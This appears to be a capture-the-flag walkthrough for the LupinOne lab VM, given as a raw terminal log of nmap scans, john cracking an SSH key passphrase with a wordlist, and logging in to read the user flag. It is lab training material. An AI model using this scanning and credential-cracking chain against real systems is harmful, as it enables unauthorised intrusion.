└─# nmap -sn 192.168.81.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 11:34 CST Nmap scan report for localhost (192.168.81.57) Host is up (0.00016s latency). MAC Address: 00:0C:29:0C:79:7F (VMware) Nmap scan report for localhost (192.168.81.152) Host is up (0.000038s latency). MAC Address: AC:19:8E:9B:57:53 (Intel Corporate) Nmap scan report for localhost (192.168.81.161) Host is up (0.0045s latency). MAC Address: 72:4D:8C:6A:B9:C8 (Unknown) Nmap scan report for localhost (192.168.81.129) Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.45 seconds
└─# nmap --min-rate 10000 -p- 192.168.81.57 -oA nmapscan/ports Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 11:39 CST Nmap scan report for localhost (192.168.81.57) Host is up (0.00041s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 00:0C:29:0C:79:7F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.72 seconds
└─# nmap -sT -sC -sV -O -p22,80 192.168.81.57 -oA nmapscan/detail Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 13:02 CST Nmap scan report for localhost (192.168.81.57) Host is up (0.00038s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 3072 ed:ea:d9:d3:af:19:9c:8e:4e:0f:31:db:f2:5d:12:79 (RSA) | 256 bf:9f:a9:93:c5:87:21:a3:6b:6f:9e:e6:87:61:f5:19 (ECDSA) |_ 256 ac:18:ec:cc:35:c0:51:f5:6f:47:74:c3:01:95:b4:0f (ED25519) 80/tcp open http Apache httpd 2.4.48 ((Debian)) |_http-title: Site doesn't have a title (text/html). | http-robots.txt: 1 disallowed entry |_/~myfiles |_http-server-header: Apache/2.4.48 (Debian) MAC Address: 00:0C:29:0C:79:7F (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.15 - 5.8 (99%), Linux 5.0 - 5.5 (99%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 5.0 - 5.4 (96%), Linux 2.6.32 (96%), Linux 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.23 seconds
└─# nmap --script=vuln -p22,80 192.168.81.57 -oA nmapscan/vuln Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 13:07 CST Nmap scan report for localhost (192.168.81.57) Host is up (0.00019s latency).
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-csrf: Couldn't find any CSRF vulnerabilities. | http-enum: | /robots.txt: Robots file | /image/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)' |_ /manual/: Potentially interesting folder MAC Address: 00:0C:29:0C:79:7F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 30.92 seconds
└─# ssh -i rsa_key icex64@192.168.81.57 The authenticity of host '192.168.81.57 (192.168.81.57)' can't be established. ED25519 key fingerprint is SHA256:GZOCytQu/pnSRRTMvJLagwz7ZPlJMDiyabwLvxTrKME. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.81.57' (ED25519) to the list of known hosts. Load key "rsa_key": error in libcrypto icex64@192.168.81.57's password:
john key_hash --wordlist=/usr/share/wordlists/fasttrack.txt
└─# john key_hash --wordlist=/usr/share/wordlists/fasttrack.txt Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes Cost 2 (iteration count) is 16 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status P@55w0rd! (rsa_key) 1g 0:00:00:02 DONE (2025-11-02 14:48) 0.3861g/s 37.06p/s 37.06c/s 37.06C/s Autumn2013..testing123 Use the "--show" option to display all of the cracked passwords reliably Session completed.
# ssh -i rsa_key icex64@192.168.81.57 # P@55w0rd!
flag1:
1 2 3 4 5 6 7 8 9 10
whoami pwd cat user.txt
icex64@LupinOne:~$ pwd /home/icex64 icex64@LupinOne:~$ ls user.txt